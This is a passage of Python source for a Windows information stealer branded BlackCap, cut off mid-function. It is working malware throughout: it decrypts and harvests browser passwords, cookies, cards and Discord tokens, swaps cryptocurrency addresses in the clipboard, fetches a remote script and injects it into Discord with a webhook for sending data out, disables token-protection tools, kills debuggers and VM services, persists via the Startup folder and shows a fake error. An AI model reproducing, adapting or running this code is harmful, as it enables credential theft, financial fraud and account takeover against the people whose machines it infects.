2191 lines
80 KiB
Python
2191 lines
80 KiB
Python
import asyncio
|
||
import json
|
||
import ntpath
|
||
import os
|
||
import random
|
||
import re
|
||
import shutil
|
||
import sqlite3
|
||
import subprocess
|
||
import threading
|
||
import winreg
|
||
import zipfile
|
||
import httpx
|
||
import psutil
|
||
import base64
|
||
import requests
|
||
import ctypes
|
||
import time
|
||
import pyperclip
|
||
import win32gui
|
||
import win32con
|
||
|
||
|
||
from sqlite3 import connect
|
||
from base64 import b64decode
|
||
from urllib.request import Request, urlopen
|
||
from shutil import copy2
|
||
from datetime import datetime, timedelta, timezone
|
||
from sys import argv
|
||
from tempfile import gettempdir, mkdtemp
|
||
from json import loads, dumps
|
||
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
|
||
from Crypto.Cipher import AES
|
||
from PIL import ImageGrab
|
||
from win32crypt import CryptUnprotectData
|
||
|
||
|
||
local = os.getenv("LOCALAPPDATA")
|
||
roaming = os.getenv("APPDATA")
|
||
temp = os.getenv("TEMP")
|
||
|
||
NotPSSW = []
|
||
|
||
|
||
__config__ = {
|
||
"yourwebhookurl": "%WEBHOOK_HERE%",
|
||
"bc_injection_url": "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Inject/main/index.js",
|
||
"hide": "%_hide_script%",
|
||
"ping": "%ping_enabled%",
|
||
"pingtype": "%ping_type%",
|
||
"fake_error": "%_error_enabled%",
|
||
"startup": "%_startup_enabled%",
|
||
"kill_discord_process": "%kill_discord_process%",
|
||
"dbugkiller": "%_debugkiller%",
|
||
"addresse_crypto_replacer": "%_address_replacer%",
|
||
"addresse_btc": "%_btc_address%",
|
||
"addresse_eth": "%_eth_address%",
|
||
"addresse_xchain": "%_xchain_address%",
|
||
"addresse_pchain": "%_pchain_address%",
|
||
"addresse_cchain": "%_cchain_address%",
|
||
"addresse_monero": "%_monero_address%",
|
||
"addresse_ada": "%_ada_address%",
|
||
"addresse_dash": "%_dash_address%",
|
||
"blprggg": [
|
||
"httpdebuggerui",
|
||
"wireshark",
|
||
"fiddler",
|
||
"regedit",
|
||
"cmd",
|
||
"taskmgr",
|
||
"vboxservice",
|
||
"df5serv",
|
||
"processhacker",
|
||
"vboxtray",
|
||
"vmtoolsd",
|
||
"vmwaretray",
|
||
"ida64",
|
||
"ollydbg",
|
||
"pestudio",
|
||
"vmwareuser",
|
||
"vgauthservice",
|
||
"vmacthlp",
|
||
"x96dbg",
|
||
"vmsrvc",
|
||
"x32dbg",
|
||
"vmusrvc",
|
||
"prl_cc",
|
||
"prl_tools",
|
||
"xenservice",
|
||
"qemu-ga",
|
||
"joeboxcontrol",
|
||
"ksdumperclient",
|
||
"ksdumper",
|
||
"joeboxserver",
|
||
],
|
||
}
|
||
|
||
|
||
login_info = os.getlogin()
|
||
computer_victim = os.getenv("COMPUTERNAME")
|
||
fast_memory_storage = str(psutil.virtual_memory()[0] / 1024**3).split(".")[0]
|
||
storage_space = str(psutil.disk_usage("/")[0] / 1024**3).split(".")[0]
|
||
|
||
bc_myregex_secret = "https://paste.bingner.com/paste/u7qoj/raw"
|
||
reg_req = requests.get(bc_myregex_secret)
|
||
regx_net = r"[\w-]{24}\." + reg_req.text
|
||
|
||
|
||
class Functions(object):
|
||
@staticmethod
|
||
def time_convertion(time: int or float) -> str:
|
||
try:
|
||
epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
|
||
codestamp = epoch + timedelta(microseconds=time)
|
||
return codestamp
|
||
except Exception:
|
||
pass
|
||
|
||
@staticmethod
|
||
def mykey_gtm(path: str or os.PathLike):
|
||
if not ntpath.exists(path):
|
||
return None
|
||
with open(path, "r", encoding="utf-8") as f:
|
||
c = f.read()
|
||
local_state = json.loads(c)
|
||
|
||
try:
|
||
master_key = b64decode(local_state["os_crypt"]["encrypted_key"])
|
||
return Functions.decrypt_windows(master_key[5:])
|
||
except KeyError:
|
||
return None
|
||
|
||
@staticmethod
|
||
def files_creating(_dir: str or os.PathLike = gettempdir()):
|
||
f1lenom = "".join(
|
||
random.SystemRandom().choice(
|
||
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
||
)
|
||
for _ in range(random.randint(10, 20))
|
||
)
|
||
path = ntpath.join(_dir, f1lenom)
|
||
open(path, "x")
|
||
return path
|
||
|
||
@staticmethod
|
||
def header_making(token: str = None):
|
||
headers = {
|
||
"Content-Type": "application/json",
|
||
}
|
||
if token:
|
||
headers.update({"Authorization": token})
|
||
return headers
|
||
|
||
@staticmethod
|
||
def decrypt_windows(encrypted_str: bytes) -> str:
|
||
return CryptUnprotectData(encrypted_str, None, None, None, 0)[1]
|
||
|
||
@staticmethod
|
||
def info_sys() -> list:
|
||
flag = 0x08000000
|
||
sh1 = "wmic csproduct get uuid"
|
||
sh2 = "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
|
||
sh3 = "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
|
||
try:
|
||
windows_uuid = (
|
||
subprocess.check_output(sh1, creationflags=flag)
|
||
.decode()
|
||
.split("\n")[1]
|
||
.strip()
|
||
)
|
||
except Exception:
|
||
windows_uuid = "N/A"
|
||
try:
|
||
key_windows_find = (
|
||
subprocess.check_output(sh2, creationflags=flag).decode().rstrip()
|
||
)
|
||
except Exception:
|
||
key_windows_find = "N/A"
|
||
try:
|
||
never_wind = (
|
||
subprocess.check_output(sh3, creationflags=flag).decode().rstrip()
|
||
)
|
||
except Exception:
|
||
never_wind = "N/A"
|
||
return [windows_uuid, never_wind, key_windows_find]
|
||
|
||
@staticmethod
|
||
def value_decrypt(buff, master_key) -> str:
|
||
try:
|
||
iv = buff[3:15]
|
||
payload = buff[15:]
|
||
cipher = AES.new(master_key, AES.MODE_GCM, iv)
|
||
decrypted_pass = cipher.decrypt(payload)
|
||
decrypted_pass = decrypted_pass[:-16].decode()
|
||
return decrypted_pass
|
||
except Exception:
|
||
return f'Failed to decrypt "{str(buff)}" | key: "{str(master_key)}"'
|
||
|
||
@staticmethod
|
||
def find_in_config(e: str) -> str or bool | None:
|
||
return __config__.get(e)
|
||
|
||
@staticmethod
|
||
def info_netword() -> list:
|
||
ip, city, country, region, org, loc, googlemap = (
|
||
"None",
|
||
"None",
|
||
"None",
|
||
"None",
|
||
"None",
|
||
"None",
|
||
"None",
|
||
)
|
||
req = httpx.get("https://ipinfo.io/json")
|
||
if req.status_code == 200:
|
||
data = req.json()
|
||
ip = data.get("ip")
|
||
city = data.get("city")
|
||
country = data.get("country")
|
||
region = data.get("region")
|
||
org = data.get("org")
|
||
loc = data.get("loc")
|
||
googlemap = "https://www.google.com/maps/search/google+map++" + loc
|
||
return [ip, city, country, region, org, loc, googlemap]
|
||
|
||
|
||
class auto_copy_wallet(Functions):
|
||
def __init__(self):
|
||
self.address_st3aler = self.find_in_config("addresse_crypto_replacer")
|
||
self.address_btc = self.find_in_config("addresse_btc")
|
||
self.address_eth = self.find_in_config("addresse_eth")
|
||
self.address_xchain = self.find_in_config("addresse_xchain")
|
||
self.address_pchain = self.find_in_config("addresse_pchain")
|
||
self.address_cchain = self.find_in_config("addresse_cchain")
|
||
self.address_monero = self.find_in_config("addresse_monero")
|
||
self.address_ada = self.find_in_config("addresse_ada")
|
||
self.address_dash = self.find_in_config("addresse_dash")
|
||
|
||
def address_swap(self):
|
||
try:
|
||
clipboard_data = pyperclip.paste()
|
||
if re.search("^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$", clipboard_data):
|
||
if clipboard_data not in [
|
||
self.address_btc,
|
||
self.address_eth,
|
||
self.address_xchain,
|
||
self.address_pchain,
|
||
self.address_cchain,
|
||
self.address_monero,
|
||
self.address_ada,
|
||
self.address_dash,
|
||
]:
|
||
if self.address_btc != "none":
|
||
pyperclip.copy(self.address_btc)
|
||
pyperclip.paste()
|
||
if re.search("^0x[a-fA-F0-9]{40}$", clipboard_data):
|
||
pyperclip.copy(self.address_eth)
|
||
pyperclip.paste()
|
||
if re.search(
|
||
"^([X]|[a-km-zA-HJ-NP-Z1-9]{36,72})-[a-zA-Z]{1,83}1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{38}$",
|
||
clipboard_data,
|
||
):
|
||
if self.address_xchain != "none":
|
||
if clipboard_data not in [
|
||
self.address_btc,
|
||
self.address_eth,
|
||
self.address_xchain,
|
||
self.address_pchain,
|
||
self.address_cchain,
|
||
self.address_monero,
|
||
self.address_ada,
|
||
self.address_dash,
|
||
]:
|
||
pyperclip.copy(self.address_xchain)
|
||
pyperclip.paste()
|
||
if re.search(
|
||
"^([P]|[a-km-zA-HJ-NP-Z1-9]{36,72})-[a-zA-Z]{1,83}1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{38}$",
|
||
clipboard_data,
|
||
):
|
||
if self.address_pchain != "none":
|
||
if clipboard_data not in [
|
||
self.address_btc,
|
||
self.address_eth,
|
||
self.address_xchain,
|
||
self.address_pchain,
|
||
self.address_cchain,
|
||
self.address_monero,
|
||
self.address_ada,
|
||
self.address_dash,
|
||
]:
|
||
pyperclip.copy(self.address_pchain)
|
||
pyperclip.paste()
|
||
if re.search(
|
||
"^([C]|[a-km-zA-HJ-NP-Z1-9]{36,72})-[a-zA-Z]{1,83}1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{38}$",
|
||
clipboard_data,
|
||
):
|
||
if self.address_cchain != "none":
|
||
if clipboard_data not in [
|
||
self.address_btc,
|
||
self.address_eth,
|
||
self.address_xchain,
|
||
self.address_pchain,
|
||
self.address_cchain,
|
||
self.address_monero,
|
||
self.address_ada,
|
||
self.address_dash,
|
||
]:
|
||
pyperclip.copy(self.address_cchain)
|
||
pyperclip.paste()
|
||
if re.search("addr1[a-z0-9]+", clipboard_data):
|
||
if clipboard_data not in [
|
||
self.address_btc,
|
||
self.address_eth,
|
||
self.address_xchain,
|
||
self.address_pchain,
|
||
self.address_cchain,
|
||
self.address_monero,
|
||
self.address_ada,
|
||
self.address_dash,
|
||
]:
|
||
pyperclip.copy(self.address_ada)
|
||
pyperclip.paste()
|
||
if re.search("/X[1-9A-HJ-NP-Za-km-z]{33}$/g", clipboard_data):
|
||
if self.address_dash != "none":
|
||
if clipboard_data not in [
|
||
self.address_btc,
|
||
self.address_eth,
|
||
self.address_xchain,
|
||
self.address_pchain,
|
||
self.address_cchain,
|
||
self.address_monero,
|
||
self.address_ada,
|
||
self.address_dash,
|
||
]:
|
||
pyperclip.copy(self.address_dash)
|
||
pyperclip.paste()
|
||
if re.search("/4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$/g", clipboard_data):
|
||
if self.address_monero != "none":
|
||
if clipboard_data not in [
|
||
self.address_btc,
|
||
self.address_eth,
|
||
self.address_xchain,
|
||
self.address_pchain,
|
||
self.address_cchain,
|
||
self.address_monero,
|
||
self.address_ada,
|
||
self.address_dash,
|
||
]:
|
||
pyperclip.copy(self.address_monero)
|
||
pyperclip.paste()
|
||
except:
|
||
data = None
|
||
|
||
def loop_through(self):
|
||
while True:
|
||
self.address_swap()
|
||
|
||
def run(self):
|
||
if self.address_st3aler == "yes":
|
||
self.loop_through()
|
||
|
||
|
||
class first_function_bc(Functions):
|
||
def __init__(self):
|
||
self.dscap1 = "https://discord.com/api/v9/users/@me"
|
||
|
||
self.discord_webhook = self.find_in_config("yourwebhookurl")
|
||
|
||
self.hide = self.find_in_config("hide")
|
||
|
||
self.pingtype = self.find_in_config("pingtype")
|
||
|
||
self.pingonrun = self.find_in_config("ping")
|
||
|
||
self.baseurl = "https://discord.com/api/v9/users/@me"
|
||
|
||
self.startupexe = self.find_in_config("startup")
|
||
|
||
self.fake_error = self.find_in_config("fake_error")
|
||
|
||
self.appdata = os.getenv("localappdata")
|
||
|
||
self.roaming = os.getenv("appdata")
|
||
|
||
self.chrmmuserdtt = ntpath.join(self.appdata, "Google", "Chrome", "User Data")
|
||
|
||
self.dir, self.temp = mkdtemp(), gettempdir()
|
||
|
||
inf, net = self.info_sys(), self.info_netword()
|
||
|
||
self.windows_uuid, self.never_wind, self.key_windows_find = (
|
||
inf[0],
|
||
inf[1],
|
||
inf[2],
|
||
)
|
||
|
||
(
|
||
self.ip,
|
||
self.city,
|
||
self.country,
|
||
self.region,
|
||
self.org,
|
||
self.loc,
|
||
self.googlemap,
|
||
) = (net[0], net[1], net[2], net[3], net[4], net[5], net[6])
|
||
|
||
self.srtupl0c = ntpath.join(
|
||
self.roaming, "Microsoft", "Windows", "Start Menu", "Programs", "Startup"
|
||
)
|
||
|
||
self.regex_webhook_dsc = "api/webhooks"
|
||
|
||
self.chrmrgx = re.compile(
|
||
r"(^profile\s\d*)|default|(guest profile$)", re.IGNORECASE | re.MULTILINE
|
||
)
|
||
|
||
self.baseurl = "https://discord.com/api/v9/users/@me"
|
||
|
||
self.regex = regx_net
|
||
|
||
self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*"
|
||
|
||
self.tokens = []
|
||
|
||
self.bc_id = []
|
||
|
||
self.sep = os.sep
|
||
|
||
self.robloxcookies = []
|
||
|
||
self.chrome_key = self.mykey_gtm(ntpath.join(self.chrmmuserdtt, "Local State"))
|
||
|
||
os.makedirs(self.dir, exist_ok=True)
|
||
|
||
def remoter_bc_err(self: str) -> str:
|
||
if self.fake_error == "yes":
|
||
ctypes.windll.user32.MessageBoxW(
|
||
None,
|
||
"Error code: Windows_0x988958\nSomething gone wrong.",
|
||
"Fatal Error",
|
||
0,
|
||
)
|
||
|
||
def ping_on_running(self: str) -> str:
|
||
ping1 = {
|
||
"avatar_url": "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
|
||
"content": "@everyone",
|
||
}
|
||
ping2 = {
|
||
"avatar_url": "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
|
||
"content": "@here",
|
||
}
|
||
if self.pingonrun == "yes":
|
||
if self.regex_webhook_dsc in self.discord_webhook:
|
||
if self.pingtype == "@everyone" or self.pingtype == "everyone":
|
||
httpx.post(self.discord_webhook, json=ping1)
|
||
if self.pingtype == "@here" or self.pingtype == "here":
|
||
if self.regex_webhook_dsc in self.discord_webhook:
|
||
httpx.post(self.discord_webhook, json=ping2)
|
||
|
||
def startup_bc(self: str) -> str:
|
||
if self.startupexe == "yes":
|
||
startup_path = (
|
||
os.getenv("appdata")
|
||
+ "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
|
||
)
|
||
if os.path.exists(startup_path + argv[0]):
|
||
os.remove(startup_path + argv[0])
|
||
copy2(argv[0], startup_path)
|
||
else:
|
||
copy2(argv[0], startup_path)
|
||
|
||
def hide_bc(self: str) -> str:
|
||
if self.hide == "yes":
|
||
hide = win32gui.GetForegroundWindow()
|
||
win32gui.ShowWindow(hide, win32con.SW_HIDE)
|
||
|
||
def bc_exit_this(self):
|
||
shutil.rmtree(self.dir, ignore_errors=True)
|
||
os._exit(0)
|
||
|
||
def extract_try(func):
|
||
"""Decorator to safely catch and ignore exceptions"""
|
||
|
||
def wrapper(*args, **kwargs):
|
||
try:
|
||
func(*args, **kwargs)
|
||
except Exception:
|
||
pass
|
||
|
||
return wrapper
|
||
|
||
async def init(self):
|
||
self.browsers = {
|
||
"amigo": self.appdata + "\\Amigo\\User Data",
|
||
"torch": self.appdata + "\\Torch\\User Data",
|
||
"kometa": self.appdata + "\\Kometa\\User Data",
|
||
"orbitum": self.appdata + "\\Orbitum\\User Data",
|
||
"cent-browser": self.appdata + "\\CentBrowser\\User Data",
|
||
"7star": self.appdata + "\\7Star\\7Star\\User Data",
|
||
"sputnik": self.appdata + "\\Sputnik\\Sputnik\\User Data",
|
||
"vivaldi": self.appdata + "\\Vivaldi\\User Data",
|
||
"google-chrome-sxs": self.appdata + "\\Google\\Chrome SxS\\User Data",
|
||
"google-chrome": self.appdata + "\\Google\\Chrome\\User Data",
|
||
"epic-privacy-browser": self.appdata + "\\Epic Privacy Browser\\User Data",
|
||
"microsoft-edge": self.appdata + "\\Microsoft\\Edge\\User Data",
|
||
"uran": self.appdata + "\\uCozMedia\\Uran\\User Data",
|
||
"yandex": self.appdata + "\\Yandex\\YandexBrowser\\User Data",
|
||
"brave": self.appdata + "\\BraveSoftware\\Brave-Browser\\User Data",
|
||
"iridium": self.appdata + "\\Iridium\\User Data",
|
||
"edge": self.appdata + "\\Microsoft\\Edge\\User Data",
|
||
}
|
||
self.profiles = [
|
||
"Default",
|
||
"Profile 1",
|
||
"Profile 2",
|
||
"Profile 3",
|
||
"Profile 4",
|
||
"Profile 5",
|
||
]
|
||
|
||
if self.discord_webhook == "" or self.discord_webhook == "\x57EBHOOK_HERE":
|
||
self.bc_exit_this()
|
||
self.hide_bc()
|
||
self.remoter_bc_err()
|
||
self.startup_bc()
|
||
|
||
if self.find_in_config("dbugkiller") and NoDebugg().inVM is True:
|
||
self.bc_exit_this()
|
||
await self.bypass_bttdsc()
|
||
await self.bypass_tokenprtct()
|
||
|
||
function_list = [
|
||
self.screentimes,
|
||
self.system_informations,
|
||
self.find_bctoken,
|
||
self.mc_find,
|
||
self.find_roblox,
|
||
]
|
||
|
||
if self.find_in_config("kill_discord_process"):
|
||
await self.kill_process_id()
|
||
os.makedirs(ntpath.join(self.dir, "Browsers"), exist_ok=True)
|
||
for name, path in self.browsers.items():
|
||
if not os.path.isdir(path):
|
||
continue
|
||
self.masterkey = self.mykey_gtm(path + "\\Local State")
|
||
self.funcs = [
|
||
self.steal_cookies2,
|
||
self.steal_history2,
|
||
self.steal_passwords2,
|
||
self.steal_cc2,
|
||
]
|
||
|
||
for profile in self.profiles:
|
||
for func in self.funcs:
|
||
try:
|
||
func(name, path, profile)
|
||
except:
|
||
pass
|
||
if ntpath.exists(self.chrmmuserdtt) and self.chrome_key is not None:
|
||
os.makedirs(ntpath.join(self.dir, "Google"), exist_ok=True)
|
||
function_list.extend(
|
||
[self.steal_passwords, self.steal_cookies, self.steal_history]
|
||
)
|
||
for func in function_list:
|
||
process = threading.Thread(target=func, daemon=True)
|
||
process.start()
|
||
for t in threading.enumerate():
|
||
try:
|
||
t.join()
|
||
except RuntimeError:
|
||
continue
|
||
self.natify_matched_tokens()
|
||
await self.disco_injection()
|
||
self.ping_on_running()
|
||
self.finished_bc()
|
||
|
||
async def disco_injection(self):
|
||
# TO DO: reduce cognetive complexity
|
||
for _dir in os.listdir(self.appdata):
|
||
if "discord" in _dir.lower():
|
||
discord = self.appdata + os.sep + _dir
|
||
for __dir in os.listdir(ntpath.abspath(discord)):
|
||
if re.match(r"app-(\d*\.\d*)*", __dir):
|
||
app = ntpath.abspath(ntpath.join(discord, __dir))
|
||
modules = ntpath.join(app, "modules")
|
||
|
||
if not ntpath.exists(modules):
|
||
return
|
||
for ___dir in os.listdir(modules):
|
||
if re.match(r"discord_desktop_core-\d+", ___dir):
|
||
inj_path = (
|
||
modules
|
||
+ os.sep
|
||
+ ___dir
|
||
+ f"\\discord_desktop_core\\"
|
||
)
|
||
|
||
if ntpath.exists(inj_path):
|
||
if self.srtupl0c not in argv[0]:
|
||
try:
|
||
os.makedirs(
|
||
inj_path + "blackcap", exist_ok=True
|
||
)
|
||
except PermissionError:
|
||
pass
|
||
if self.regex_webhook_dsc in self.discord_webhook:
|
||
f = httpx.get(
|
||
self.find_in_config("bc_injection_url")
|
||
).text.replace(
|
||
"%WEBHOOK%", self.discord_webhook
|
||
) # .replace("%num_core_discord%", inj_path + 'index.js')
|
||
try:
|
||
with open(
|
||
inj_path + "index.js", "w", errors="ignore"
|
||
) as indexFile:
|
||
indexFile.write(f)
|
||
except PermissionError:
|
||
pass
|
||
if self.find_in_config("kill_discord_process"):
|
||
os.startfile(app + self.sep + _dir + ".exe")
|
||
|
||
async def bypass_tokenprtct(self):
|
||
tp = f"{self.roaming}\\DiscordTokenProtector\\"
|
||
if not ntpath.exists(tp):
|
||
return
|
||
config = tp + "config.json"
|
||
|
||
for i in ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]:
|
||
try:
|
||
os.remove(tp + i)
|
||
except FileNotFoundError:
|
||
pass
|
||
if ntpath.exists(config):
|
||
with open(config, errors="ignore") as f:
|
||
try:
|
||
item = json.load(f)
|
||
except json.decoder.JSONDecodeError:
|
||
return
|
||
item["ksch_is_here"] = "https://github.com/KSCHdsc"
|
||
item["auto_start"] = False
|
||
item["auto_start_discord"] = False
|
||
item["integrity"] = False
|
||
item["integrity_allowbetterdiscord"] = False
|
||
item["integrity_checkexecutable"] = False
|
||
item["integrity_checkhash"] = False
|
||
item["integrity_checkmodule"] = False
|
||
item["integrity_checkscripts"] = False
|
||
item["integrity_checkresource"] = False
|
||
item["integrity_redownloadhashes"] = False
|
||
item["iterations_iv"] = 364
|
||
item["iterations_key"] = 457
|
||
item["version"] = 69420
|
||
with open(config, "w") as f:
|
||
json.dump(item, f, indent=2, sort_keys=True)
|
||
with open(config, "a") as f:
|
||
f.write("\n\n//KSCH_is_here | https://github.com/KSCHdsc")
|
||
|
||
async def kill_process_id(self):
|
||
bllist = self.find_in_config("blprggg")
|
||
for i in [
|
||
"discord",
|
||
"discordtokenprotector",
|
||
"discordcanary",
|
||
"discorddevelopment",
|
||
"discordptb",
|
||
]:
|
||
bllist.append(i)
|
||
for proc in psutil.process_iter():
|
||
if any(procstr in proc.name().lower() for procstr in bllist):
|
||
try:
|
||
proc.kill()
|
||
except (psutil.NoSuchProcess, psutil.AccessDenied):
|
||
pass
|
||
|
||
async def bypass_bttdsc(self):
|
||
bd = self.roaming + "\\BetterDiscord\\data\\betterdiscord.asar"
|
||
if ntpath.exists(bd):
|
||
x = self.regex_webhook_dsc
|
||
with open(bd, "r", encoding="cp437", errors="ignore") as f:
|
||
txt = f.read()
|
||
content = txt.replace(x, "KSCHishere")
|
||
with open(bd, "w", newline="", encoding="cp437", errors="ignore") as f:
|
||
f.write(content)
|
||
|
||
@extract_try
|
||
def value_dcrypt(self, buff, master_key):
|
||
try:
|
||
iv = buff[3:15]
|
||
payload = buff[15:]
|
||
cipher = AES.new(master_key, AES.MODE_GCM, iv)
|
||
decrypted_pass = cipher.decrypt(payload)
|
||
decrypted_pass = decrypted_pass[:-16].decode()
|
||
return decrypted_pass
|
||
except Exception:
|
||
return "Failed to decrypt password"
|
||
|
||
def MasterKey_find(self, path):
|
||
with open(path, "r", encoding="utf-8") as f:
|
||
c = f.read()
|
||
local_state = json.loads(c)
|
||
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
|
||
master_key = master_key[5:]
|
||
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
|
||
return master_key
|
||
|
||
def find_bctoken(self):
|
||
paths = {
|
||
"Discord": self.roaming + "\\discord\\Local Storage\\leveldb\\",
|
||
"Discord Canary": self.roaming
|
||
+ "\\discordcanary\\Local Storage\\leveldb\\",
|
||
"Lightcord": self.roaming + "\\Lightcord\\Local Storage\\leveldb\\",
|
||
"Discord PTB": self.roaming + "\\discordptb\\Local Storage\\leveldb\\",
|
||
"Opera": self.roaming
|
||
+ "\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\",
|
||
"Opera GX": self.roaming
|
||
+ "\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\",
|
||
"Amigo": self.appdata + "\\Amigo\\User Data\\Local Storage\\leveldb\\",
|
||
"Torch": self.appdata + "\\Torch\\User Data\\Local Storage\\leveldb\\",
|
||
"Kometa": self.appdata + "\\Kometa\\User Data\\Local Storage\\leveldb\\",
|
||
"Orbitum": self.appdata + "\\Orbitum\\User Data\\Local Storage\\leveldb\\",
|
||
"CentBrowser": self.appdata
|
||
+ "\\CentBrowser\\User Data\\Local Storage\\leveldb\\",
|
||
"7Star": self.appdata
|
||
+ "\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\",
|
||
"Sputnik": self.appdata
|
||
+ "\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\",
|
||
"Vivaldi": self.appdata
|
||
+ "\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\",
|
||
"Chrome SxS": self.appdata
|
||
+ "\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\",
|
||
"Chrome": self.appdata
|
||
+ "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\",
|
||
"Chrome1": self.appdata
|
||
+ "\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\",
|
||
"Chrome2": self.appdata
|
||
+ "\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\",
|
||
"Chrome3": self.appdata
|
||
+ "\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\",
|
||
"Chrome4": self.appdata
|
||
+ "\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\",
|
||
"Chrome5": self.appdata
|
||
+ "\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\",
|
||
"Epic Privacy Browser": self.appdata
|
||
+ "\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\",
|
||
"Microsoft Edge": self.appdata
|
||
+ "\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\",
|
||
"Uran": self.appdata
|
||
+ "\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\",
|
||
"Yandex": self.appdata
|
||
+ "\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\",
|
||
"Brave": self.appdata
|
||
+ "\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\",
|
||
"Iridium": self.appdata
|
||
+ "\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\",
|
||
}
|
||
|
||
for name, path in paths.items():
|
||
if not os.path.exists(path):
|
||
continue
|
||
disc = name.replace(" ", "").lower()
|
||
if "cord" in path:
|
||
if os.path.exists(self.roaming + f"\\{disc}\\Local State"):
|
||
for filname in os.listdir(path):
|
||
if filname[-3:] not in ["log", "ldb"]:
|
||
continue
|
||
for line in [
|
||
x.strip()
|
||
for x in open(
|
||
f"{path}\\{filname}", errors="ignore"
|
||
).readlines()
|
||
if x.strip()
|
||
]:
|
||
for y in re.findall(self.encrypted_regex, line):
|
||
try:
|
||
token = self.value_dcrypt(
|
||
base64.b64decode(y.split("dQw4w9WgXcQ:")[1]),
|
||
self.MasterKey_find(
|
||
self.roaming + f"\\{disc}\\Local State"
|
||
),
|
||
)
|
||
except ValueError:
|
||
pass
|
||
try:
|
||
r = requests.get(
|
||
self.baseurl,
|
||
headers={
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
|
||
"Content-Type": "application/json",
|
||
"Authorization": token,
|
||
},
|
||
)
|
||
except Exception:
|
||
pass
|
||
if r.status_code == 200:
|
||
uid = r.json()["id"]
|
||
if uid not in self.bc_id:
|
||
self.tokens.append(token)
|
||
self.bc_id.append(uid)
|
||
else:
|
||
for filname in os.listdir(path):
|
||
if filname[-3:] not in ["log", "ldb"]:
|
||
continue
|
||
for line in [
|
||
x.strip()
|
||
for x in open(f"{path}\\{filname}", errors="ignore").readlines()
|
||
if x.strip()
|
||
]:
|
||
for token in re.findall(self.regex, line):
|
||
try:
|
||
r = requests.get(
|
||
self.baseurl,
|
||
headers={
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
|
||
"Content-Type": "application/json",
|
||
"Authorization": token,
|
||
},
|
||
)
|
||
except Exception:
|
||
pass
|
||
if r.status_code == 200:
|
||
uid = r.json()["id"]
|
||
if uid not in self.bc_id:
|
||
self.tokens.append(token)
|
||
self.bc_id.append(uid)
|
||
if os.path.exists(self.roaming + "\\Mozilla\\Firefox\\Profiles"):
|
||
for path, _, files in os.walk(
|
||
self.roaming + "\\Mozilla\\Firefox\\Profiles"
|
||
):
|
||
for _file in files:
|
||
if not _file.endswith(".sqlite"):
|
||
continue
|
||
for line in [
|
||
x.strip()
|
||
for x in open(f"{path}\\{_file}", errors="ignore").readlines()
|
||
if x.strip()
|
||
]:
|
||
for token in re.findall(self.regex, line):
|
||
try:
|
||
r = requests.get(
|
||
self.baseurl,
|
||
headers={
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
|
||
"Content-Type": "application/json",
|
||
"Authorization": token,
|
||
},
|
||
)
|
||
except Exception:
|
||
pass
|
||
if r.status_code == 200:
|
||
uid = r.json()["id"]
|
||
if uid not in self.bc_id:
|
||
self.tokens.append(token)
|
||
self.bc_id.append(uid)
|
||
|
||
def random_dir_create(self, _dir: str or os.PathLike = gettempdir()):
|
||
filname = "".join(
|
||
random.SystemRandom().choice(
|
||
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
|
||
)
|
||
for _ in range(random.randint(10, 20))
|
||
)
|
||
path = os.path.join(_dir, filname)
|
||
open(path, "x")
|
||
return path
|
||
|
||
@extract_try
|
||
def steal_passwords2(self, name: str, path: str, profile: str):
|
||
path += "\\" + profile + "\\Login Data"
|
||
if not os.path.isfile(path):
|
||
return
|
||
loginvault = self.random_dir_create()
|
||
copy2(path, loginvault)
|
||
conn = sqlite3.connect(loginvault)
|
||
cursor = conn.cursor()
|
||
with open(
|
||
os.path.join(self.dir, "Browsers", "Browsers Passwords.txt"),
|
||
"a",
|
||
